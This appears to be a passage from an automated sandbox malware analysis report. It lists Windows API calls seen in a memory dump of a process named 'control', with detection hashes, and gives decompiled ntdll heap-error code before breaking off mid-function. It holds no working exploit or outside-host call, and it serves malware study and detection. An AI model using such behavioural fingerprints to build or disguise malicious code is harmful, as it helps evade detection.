CreateProcessInternalW.KERNELBASE(?,?,?,00000010,?,00000044,?,?,?,00000044,?,00000010,?,?,?,?), ref: 0061A6E4

Memory Dump Source

Source File: 00000015.00000002.508372558.0000000000600000.00000040.80000000.00040000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_600000_control.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 8dbd63b25b3f28a76df650e33dd4d80e3347d5b984f8cc5531d709e958559461
Instruction ID: 7f9f7faf903c9ab71b707fb48bef6b1caec0ed14af448420c6f2e9e8f3b15782
Opcode Fuzzy Hash: 8dbd63b25b3f28a76df650e33dd4d80e3347d5b984f8cc5531d709e958559461
Instruction Fuzzy Hash: BC01B2B2210108BFCB54DF89DC80EEB77ADAF8C754F158258BA0D97241C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0061A694 Relevance: 1.5, APIs: 1, Instructions: 40processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,?,?,00000010,?,00000044,?,?,?,00000044,?,00000010,?,?,?,?), ref: 0061A6E4

Memory Dump Source

Source File: 00000015.00000002.508372558.0000000000600000.00000040.80000000.00040000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_600000_control.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 8589a07230fe346112612f66facb185ce79196b1b58d590a2769cfa1d7883f14
Instruction ID: 570196688f85cf536c6f4dfda885e792ca86a5380de53e0c3687d33730983b51
Opcode Fuzzy Hash: 8589a07230fe346112612f66facb185ce79196b1b58d590a2769cfa1d7883f14
Instruction Fuzzy Hash: 12F0CFB2215148AFCB44DF98DC80DEB77BEAF8C354F158258FA5D97245C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00619160 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0060D2F0,?,?), ref: 0061919C

Memory Dump Source

Source File: 00000015.00000002.508372558.0000000000600000.00000040.80000000.00040000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_600000_control.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 16809be654502e1535f31eed24f698d23d9c723d2a2eeed363768dc1ccac579f
Instruction ID: 25de7a4126faa99c90b544b8945bb64c0a8882031fb8e00b0cbd32a635619283
Opcode Fuzzy Hash: 16809be654502e1535f31eed24f698d23d9c723d2a2eeed363768dc1ccac579f
Instruction Fuzzy Hash: EEE06D3338030437E22061A99C03FE7B38C9B80B20F58002AFA0EEB2C1D591F84102A8

Uniqueness

Uniqueness Score: -1.00%

Function 00619153 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0060D2F0,?,?), ref: 0061919C

Memory Dump Source

Source File: 00000015.00000002.508372558.0000000000600000.00000040.80000000.00040000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_600000_control.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 6a3c653eb95446242ab25097f4705a6bf3d7cf87e5c080aefc390fcdb235777f
Instruction ID: 8f28bce9f146d5a4762b7d27db83abfc1e455bf7247ca536c129b3d7ea7456c8
Opcode Fuzzy Hash: 6a3c653eb95446242ab25097f4705a6bf3d7cf87e5c080aefc390fcdb235777f
Instruction Fuzzy Hash: DEF0E5363803003BE7206668CC13FE777599F85B20F18002DFA8AAB2C2D591F88246E8

Uniqueness

Uniqueness Score: -1.00%

Function 0061A5E0 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00615186,?,006158FF,006158FF,?,00615186,?,?,?,?,?,00000000,00000005,00000206), ref: 0061A60D

Memory Dump Source

Source File: 00000015.00000002.508372558.0000000000600000.00000040.80000000.00040000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_600000_control.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 330f0ba7e0926623df8a94470dcffdc83c35335d94c71f9a07b84f032a473890
Instruction ID: 43846988cc3ef31b8b89df8a7348daaf284564e3eaa8f0a4bc71d5b6229b4ca3
Opcode Fuzzy Hash: 330f0ba7e0926623df8a94470dcffdc83c35335d94c71f9a07b84f032a473890
Instruction Fuzzy Hash: BEE01AB12002086BDB14DF89DC45E9737ADEF88654F118154BA085B241C530F9108AB5

Uniqueness

Uniqueness Score: -1.00%

Function 0061A620 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000005,00000000,00000000,00000005,00000060,00000000,00000000,?,?,00000000,00000206,?), ref: 0061A64D

Memory Dump Source

Source File: 00000015.00000002.508372558.0000000000600000.00000040.80000000.00040000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_600000_control.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: f303348aaf529f12bcccf2d48b2c1e01663c43a855a49447b18ce3e6b2722690
Instruction ID: b450723cf414bd5c0a98924980d01ff5338ab8e558b056728274c67f75b89c3c
Opcode Fuzzy Hash: f303348aaf529f12bcccf2d48b2c1e01663c43a855a49447b18ce3e6b2722690
Instruction Fuzzy Hash: F8E012B1200208AFDB14EF89DC49EA737ADEF88760F118158BA085B242C630E9108AB1

Uniqueness

Uniqueness Score: -1.00%

Function 0061A780 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0060D5C2,0060D5C2,?,00000000,?,?), ref: 0061A7B0

Memory Dump Source

Source File: 00000015.00000002.508372558.0000000000600000.00000040.80000000.00040000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_600000_control.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 45e0bba04d53539000b6cca76548b18b0c3cd722e235bc4e14695e8200f10b7e
Instruction ID: b3e0eee02e02e7448dfdce05019b9154ca6f89717f45da63748331e5b14f3d99
Opcode Fuzzy Hash: 45e0bba04d53539000b6cca76548b18b0c3cd722e235bc4e14695e8200f10b7e
Instruction Fuzzy Hash: DCE01AB12002086FDB10DF89CC45EE737ADEF89664F118154BA0C57241C530E8158AB5

Uniqueness

Uniqueness Score: -1.00%

Function 0060DA28 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,00608233,?), ref: 0060DA5B

Memory Dump Source

Source File: 00000015.00000002.508372558.0000000000600000.00000040.80000000.00040000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_600000_control.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 11ab23e07af699c794032828e3fe46ceb5bc4e2e0ad58be212343a5c8e444200
Instruction ID: 64bc5e225744a2354a19a040580ee6db6fa2730c8eedbf7e39a5c7a8f1ec79fd
Opcode Fuzzy Hash: 11ab23e07af699c794032828e3fe46ceb5bc4e2e0ad58be212343a5c8e444200
Instruction Fuzzy Hash: 86E0C232BC42002AEB20DAB09C83F9977869F8A641F0940E8F909EB3C3DA64E1018610

Uniqueness

Uniqueness Score: -1.00%

Function 0060DA30 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,00608233,?), ref: 0060DA5B

Memory Dump Source

Source File: 00000015.00000002.508372558.0000000000600000.00000040.80000000.00040000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_600000_control.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 785235cf212cd6fac8d19be006f72e66bb65ffde2b76f0b6724cfa02a8199225
Instruction ID: 1ac051069fbe39691d6e55a1e5cfd552ded20680b4ec5aaa7e7e2c37f1cb4a51
Opcode Fuzzy Hash: 785235cf212cd6fac8d19be006f72e66bb65ffde2b76f0b6724cfa02a8199225
Instruction Fuzzy Hash: 1AD05E7168030427F610EAE48C43F6672C99B48A50F494064FA09963C2D950E4004164

Uniqueness

Uniqueness Score: -1.00%

Function 0462967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04629694

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4cf58cee9bb573d50f99746088a35b7b215f4f8374d7e9c2d498c0cc19a265ba
Instruction ID: bdbb17795a46d0cd9939e62a7e245f07e7aa3cdd5711e7ea8344e1e111d686dd
Opcode Fuzzy Hash: 4cf58cee9bb573d50f99746088a35b7b215f4f8374d7e9c2d498c0cc19a265ba
Instruction Fuzzy Hash: E0B02BF1A014C0C9F700DB600708717390077D0742F12C021D1020240A0338D094F5B1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0469B260 Relevance: 37.8, Strings: 30, Instructions: 262COMMONLIBRARYCODE

Download Yara Rule

Strings

*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0469B2DC
The instruction at %p referenced memory at %p., xrefs: 0469B432
The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0469B38F
*** Resource timeout (%p) in %ws:%s, xrefs: 0469B352
The instruction at %p tried to %s , xrefs: 0469B4B6
If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0469B314
a NULL pointer, xrefs: 0469B4E0
*** enter .exr %p for the exception record, xrefs: 0469B4F1
an invalid address, %p, xrefs: 0469B4CF
The critical section is owned by thread %p., xrefs: 0469B3B9
*** Inpage error in %ws:%s, xrefs: 0469B418
<unknown>, xrefs: 0469B27E, 0469B2D1, 0469B350, 0469B399, 0469B417, 0469B48E
read from, xrefs: 0469B4AD, 0469B4B2
*** enter .cxr %p for the context, xrefs: 0469B50D
The resource is owned shared by %d threads, xrefs: 0469B37E
*** A stack buffer overrun occurred in %ws:%s, xrefs: 0469B2F3
The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0469B3D6
This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0469B305
*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0469B53F
*** An Access Violation occurred in %ws:%s, xrefs: 0469B48F
This failed because of error %Ix., xrefs: 0469B446
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0469B47D
The resource is owned exclusively by thread %p, xrefs: 0469B374
The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0469B323
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0469B484
write to, xrefs: 0469B4A6
*** Critical Section Timeout (%p) in %ws:%s, xrefs: 0469B39B
This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0469B476
*** then kb to get the faulting stack, xrefs: 0469B51C
Go determine why that thread has not released the critical section., xrefs: 0469B3C5

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: 54e2b789a79b358877e2657c9bb67624a2d991fb2b17e9c0d5e51405e1274191
Instruction ID: 4d3d9e12ef21e13a619bcc04dd8b0ade808e04da0b7621297d9bc366dbb4b791
Opcode Fuzzy Hash: 54e2b789a79b358877e2657c9bb67624a2d991fb2b17e9c0d5e51405e1274191
Instruction Fuzzy Hash: FE81E575A40200FBEF35AF09AC45D7A3B7AFF56F56F004088F1051B211F2A1B851EAB6

Uniqueness

Uniqueness Score: -1.00%

Function 046A1C06 Relevance: 31.4, Strings: 25, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E046A1C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x45c48a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E045EB150();
				} else {
					E045EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x46d589c);
				E045EB150("Heap error detected at %p (heap handle %p)\n",  *0x46d58a0);
				_t27 =  *0x46d5898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M046A1E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E045EB150();
				} else {
					E045EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E045EB150("Error code: %d - %s\n",  *0x46d5898);
				_t113 =  *0x46d58a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E045EB150();
					} else {
						E045EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E045EB150("Parameter1: %p\n",  *0x46d58a4);
				}
				_t115 =  *0x46d58a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E045EB150();
					} else {
						E045EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E045EB150("Parameter2: %p\n",  *0x46d58a8);
				}
				_t117 =  *0x46d58ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E045EB150();
					} else {
						E045EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E045EB150("Parameter3: %p\n",  *0x46d58ac);
				}
				_t119 =  *0x46d58b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E045EB150();
					} else {
						E045EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x46d58b4);
					E045EB150("Last known valid blocks: before - %p, after - %p\n",  *0x46d58b0);
				} else {
					_t120 =  *0x46d58b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E045EB150();
				} else {
					E045EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E045EB150("Stack trace available at %p\n", 0x46d58c0);
			}

0x046a1c10
0x046a1c16
0x046a1c1e
0x046a1c3d
0x046a1c3e
0x046a1c20
0x046a1c35
0x046a1c3a
0x046a1c44
0x046a1c55
0x046a1c5a
0x046a1c65
0x046a1c67
0x00000000
0x046a1c6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x046a1c67
0x046a1cdc
0x046a1ce5
0x046a1d04
0x046a1d05
0x046a1ce7
0x046a1cfc
0x046a1d01
0x046a1d0b
0x046a1d17
0x046a1d1f
0x046a1d25
0x046a1d30
0x046a1d4f
0x046a1d50
0x046a1d32
0x046a1d47
0x046a1d4c
0x046a1d61
0x046a1d67
0x046a1d68
0x046a1d6e
0x046a1d79
0x046a1d98
0x046a1d99
0x046a1d7b
0x046a1d90
0x046a1d95
0x046a1daa
0x046a1db0
0x046a1db1
0x046a1db7
0x046a1dc2
0x046a1de1
0x046a1de2
0x046a1dc4
0x046a1dd9
0x046a1dde
0x046a1df3
0x046a1df9
0x046a1dfa
0x046a1e00
0x046a1e0a
0x046a1e13
0x046a1e32
0x046a1e33
0x046a1e15
0x046a1e2a
0x046a1e2f
0x046a1e39
0x046a1e4a
0x046a1e02
0x046a1e02
0x046a1e08
0x00000000
0x00000000
0x046a1e08
0x046a1e5b
0x046a1e7a
0x046a1e7b
0x046a1e5d
0x046a1e72
0x046a1e77
0x046a1e95

Strings

heap_failure_freelists_corruption, xrefs: 046A1CC9
heap_failure_cross_heap_operation, xrefs: 046A1CC2
heap_failure_multiple_entries_corruption, xrefs: 046A1C8A
heap_failure_unknown, xrefs: 046A1C75
HEAP: , xrefs: 046A1C16, 046A1C3D, 046A1D04, 046A1D4F, 046A1D98, 046A1DE1, 046A1E32, 046A1E7A
heap_failure_usage_after_free, xrefs: 046A1CBB
heap_failure_lfh_bitmap_mismatch, xrefs: 046A1CD7
heap_failure_invalid_allocation_type, xrefs: 046A1CB4
Parameter1: %p, xrefs: 046A1D5C
heap_failure_entry_corruption, xrefs: 046A1C83
Parameter2: %p, xrefs: 046A1DA5
Parameter3: %p, xrefs: 046A1DEE
heap_failure_listentry_corruption, xrefs: 046A1CD0
Error code: %d - %s, xrefs: 046A1D12
Last known valid blocks: before - %p, after - %p, xrefs: 046A1E45
Heap error detected at %p (heap handle %p), xrefs: 046A1C50
heap_failure_invalid_argument, xrefs: 046A1CAD
heap_failure_buffer_overrun, xrefs: 046A1C98
HEAP[%wZ]: , xrefs: 046A1C30, 046A1CF7, 046A1D42, 046A1D8B, 046A1DD4, 046A1E25, 046A1E6D
heap_failure_buffer_underrun, xrefs: 046A1C9F
heap_failure_internal, xrefs: 046A1C6E
heap_failure_virtual_block_corruption, xrefs: 046A1C91
heap_failure_generic, xrefs: 046A1C7C
Stack trace available at %p, xrefs: 046A1E86
heap_failure_block_not_busy, xrefs: 046A1CA6

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
API String ID: 0-2897834094
Opcode ID: f461cacd1e9fb6adbe446dd5b2beccb3ad47e00fd713c0592ac9cc949e08f4a4
Instruction ID: 4a6803db151dd56359a3fe8a6b32440a08d78ad7b6644147a482b883cfa18eb1
Opcode Fuzzy Hash: f461cacd1e9fb6adbe446dd5b2beccb3ad47e00fd713c0592ac9cc949e08f4a4
Instruction Fuzzy Hash: AC61F736A52952DFE315A789D885E7473E4FB01A31F09803EF40A5F700F629BD61EE0A

Uniqueness

Uniqueness Score: -1.00%

Function 0460A309 Relevance: 8.2, Strings: 6, Instructions: 687
COMMONCrypto

Download Yara Rule

C-Code - Quality: 72%

			E0460A309(signed int __ecx, signed int __edx, signed int _a4, char _a8) {
				char _v8;
				signed short _v12;
				signed short _v16;
				signed int _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				unsigned int _v52;
				signed int _v56;
				void* _v60;
				intOrPtr _v64;
				void* _v72;
				void* __ebx;
				void* __edi;
				void* __ebp;
				unsigned int _t246;
				signed char _t247;
				signed short _t249;
				unsigned int _t256;
				signed int _t262;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				intOrPtr _t270;
				signed int _t280;
				signed int _t286;
				signed int _t289;
				intOrPtr _t290;
				signed int _t291;
				signed int _t317;
				signed short _t320;
				intOrPtr _t327;
				signed int _t339;
				signed int _t344;
				signed int _t347;
				intOrPtr _t348;
				signed int _t350;
				signed int _t352;
				signed int _t353;
				signed int _t356;
				intOrPtr _t357;
				intOrPtr _t366;
				signed int _t367;
				signed int _t370;
				intOrPtr _t371;
				signed int _t372;
				signed int _t394;
				signed short _t402;
				intOrPtr _t404;
				intOrPtr _t415;
				signed int _t430;
				signed int _t433;
				signed int _t437;
				signed int _t445;
				signed short _t446;
				signed short _t449;
				signed short _t452;
				signed int _t455;
				signed int _t460;
				signed short* _t468;
				signed int _t480;
				signed int _t481;
				signed int _t483;
				intOrPtr _t484;
				signed int _t491;
				unsigned int _t506;
				unsigned int _t508;
				signed int _t513;
				signed int _t514;
				signed int _t521;
				signed short* _t533;
				signed int _t541;
				signed int _t543;
				signed int _t546;
				unsigned int _t551;
				signed int _t553;

				_t450 = __ecx;
				_t553 = __ecx;
				_t539 = __edx;
				_v28 = 0;
				_v40 = 0;
				if(( *(__ecx + 0xcc) ^  *0x46d8a68) != 0) {
					_push(_a4);
					_t513 = __edx;
					L11:
					_t246 = E0460A830(_t450, _t513);
					L7:
					return _t246;
				}
				if(_a8 != 0) {
					__eflags =  *(__edx + 2) & 0x00000008;
					if(( *(__edx + 2) & 0x00000008) != 0) {
						 *((intOrPtr*)(__ecx + 0x230)) =  *((intOrPtr*)(__ecx + 0x230)) - 1;
						_t430 = E0460DF24(__edx,  &_v12,  &_v16);
						__eflags = _t430;
						if(_t430 != 0) {
							_t157 = _t553 + 0x234;
							 *_t157 =  *(_t553 + 0x234) - _v16;
							__eflags =  *_t157;
						}
					}
					_t445 = _a4;
					_t514 = _t539;
					_v48 = _t539;
					L14:
					_t247 =  *((intOrPtr*)(_t539 + 6));
					__eflags = _t247;
					if(_t247 == 0) {
						_t541 = _t553;
					} else {
						_t541 = (_t539 & 0xffff0000) - ((_t247 & 0x000000ff) << 0x10) + 0x10000;
						__eflags = _t541;
					}
					_t249 = 7 + _t445 * 8 + _t514;
					_v12 = _t249;
					__eflags =  *_t249 - 3;
					if( *_t249 == 3) {
						_v16 = _t514 + _t445 * 8 + 8;
						E045E9373(_t553, _t514 + _t445 * 8 + 8);
						_t452 = _v16;
						_v28 =  *(_t452 + 0x10);
						 *((intOrPtr*)(_t541 + 0x30)) =  *((intOrPtr*)(_t541 + 0x30)) - 1;
						_v36 =  *(_t452 + 0x14);
						 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) - ( *(_t452 + 0x14) >> 0xc);
						 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) +  *(_t452 + 0x14);
						 *((intOrPtr*)(_t553 + 0x1f8)) =  *((intOrPtr*)(_t553 + 0x1f8)) - 1;
						_t256 =  *(_t452 + 0x14);
						__eflags = _t256 - 0x7f000;
						if(_t256 >= 0x7f000) {
							_t142 = _t553 + 0x1ec;
							 *_t142 =  *(_t553 + 0x1ec) - _t256;
							__eflags =  *_t142;
							_t256 =  *(_t452 + 0x14);
						}
						_t513 = _v48;
						_t445 = _t445 + (_t256 >> 3) + 0x20;
						_a4 = _t445;
						_v40 = 1;
					} else {
						_t27 =  &_v36;
						 *_t27 = _v36 & 0x00000000;
						__eflags =  *_t27;
					}
					__eflags =  *((intOrPtr*)(_t553 + 0x54)) -  *((intOrPtr*)(_t513 + 4));
					if( *((intOrPtr*)(_t553 + 0x54)) ==  *((intOrPtr*)(_t513 + 4))) {
						_v44 = _t513;
						_t262 = E045EA9EF(_t541, _t513);
						__eflags = _a8;
						_v32 = _t262;
						if(_a8 != 0) {
							__eflags = _t262;
							if(_t262 == 0) {
								goto L19;
							}
						}
						__eflags =  *0x46d8748 - 1;
						if( *0x46d8748 >= 1) {
							__eflags = _t262;
							if(_t262 == 0) {
								_t415 =  *[fs:0x30];
								__eflags =  *(_t415 + 0xc);
								if( *(_t415 + 0xc) == 0) {
									_push("HEAP: ");
									E045EB150();
								} else {
									E045EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push("(UCRBlock != NULL)");
								E045EB150();
								__eflags =  *0x46d7bc8;
								if( *0x46d7bc8 == 0) {
									__eflags = 1;
									E046A2073(_t445, 1, _t541, 1);
								}
								_t513 = _v48;
								_t445 = _a4;
							}
						}
						_t350 = _v40;
						_t480 = _t445 << 3;
						_v20 = _t480;
						_t481 = _t480 + _t513;
						_v24 = _t481;
						__eflags = _t350;
						if(_t350 == 0) {
							_t481 = _t481 + 0xfffffff0;
							__eflags = _t481;
						}
						_t483 = (_t481 & 0xfffff000) - _v44;
						__eflags = _t483;
						_v52 = _t483;
						if(_t483 == 0) {
							__eflags =  *0x46d8748 - 1;
							if( *0x46d8748 < 1) {
								goto L9;
							}
							__eflags = _t350;
							goto L146;
						} else {
							_t352 = E0461174B( &_v44,  &_v52, 0x4000);
							__eflags = _t352;
							if(_t352 < 0) {
								goto L94;
							}
							_t353 = E04607D50();
							_t447 = 0x7ffe0380;
							__eflags = _t353;
							if(_t353 != 0) {
								_t356 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t356 = 0x7ffe0380;
							}
							__eflags =  *_t356;
							if( *_t356 != 0) {
								_t357 =  *[fs:0x30];
								__eflags =  *(_t357 + 0x240) & 0x00000001;
								if(( *(_t357 + 0x240) & 0x00000001) != 0) {
									E046A14FB(_t447, _t553, _v44, _v52, 5);
								}
							}
							_t358 = _v32;
							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
							_t484 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t484 - 0x7f000;
							if(_t484 >= 0x7f000) {
								_t90 = _t553 + 0x1ec;
								 *_t90 =  *(_t553 + 0x1ec) - _t484;
								__eflags =  *_t90;
							}
							E045E9373(_t553, _t358);
							_t486 = _v32;
							 *((intOrPtr*)(_v32 + 0x14)) =  *((intOrPtr*)(_v32 + 0x14)) + _v52;
